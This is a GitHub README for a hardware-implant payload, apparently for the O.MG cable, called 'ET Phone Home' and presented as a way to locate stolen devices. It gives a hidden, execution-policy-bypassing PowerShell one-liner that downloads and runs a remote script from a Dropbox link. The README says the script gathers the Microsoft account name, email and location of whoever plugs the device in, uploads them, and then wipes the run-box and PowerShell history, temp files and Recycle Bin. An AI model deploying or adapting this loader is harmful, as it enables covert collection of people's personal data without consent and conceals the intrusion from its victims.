omg-payloads/payloads/library/incident_response/-OMG-ET-Phone-Home
I-Am-Jakoby a0b89f3d3c
Add files via upload
2022-05-09 22:41:39 -05:00
..
ET-Phone-Home-Execute.txt Add files via upload 2022-05-09 22:41:39 -05:00
ET-Phone-Home.ps1 Add files via upload 2022-05-09 22:41:39 -05:00
README.md Add files via upload 2022-05-09 22:41:39 -05:00

README.md

Logo

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments

ET Phone Home

A script I put together to locate your stolen devices, or your "stolen" baited devices

Description

This program is meant to locate your devices. Save the execution file on the boot partition of your devices and when someone plugs it into their computer Using a one liner in the run box a script will be downloaded and executed that grabs the Name and email of the associated microsoft account and the latitude and longitude of where the device was activated. This information is stored in a text document that is then uploaded to your dropbox. Finally the end of the script will delete the runbox and powershell history and delete the files in the TMP Folder and Recycle Bin.

Getting Started

Dependencies

  • DropBox - Your Shared link for the intended file
  • Windows 7,10,11

(back to top)

Executing program

  • Your device is plugged into the targets computer
  • Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory if your intended wifi network is not detected with the geofencing options
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl

Something Like What you see below will be in your cloud storage:

NAME

EMAIL

LATITUDE AND LONGITUDE

Jakoby

jakoby@example.com

 Latitude  Longitude
 --------  ---------
37.778919 -122.416313

(back to top)

Contributing

All contributors names will be listed here

I am Jakoby

Kalani

(back to top)

Version History

  • 0.1
    • Initial Release

(back to top)

Contact

I am Jakoby


Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ET-Phone-Home)

(back to top)

Acknowledgments

(back to top)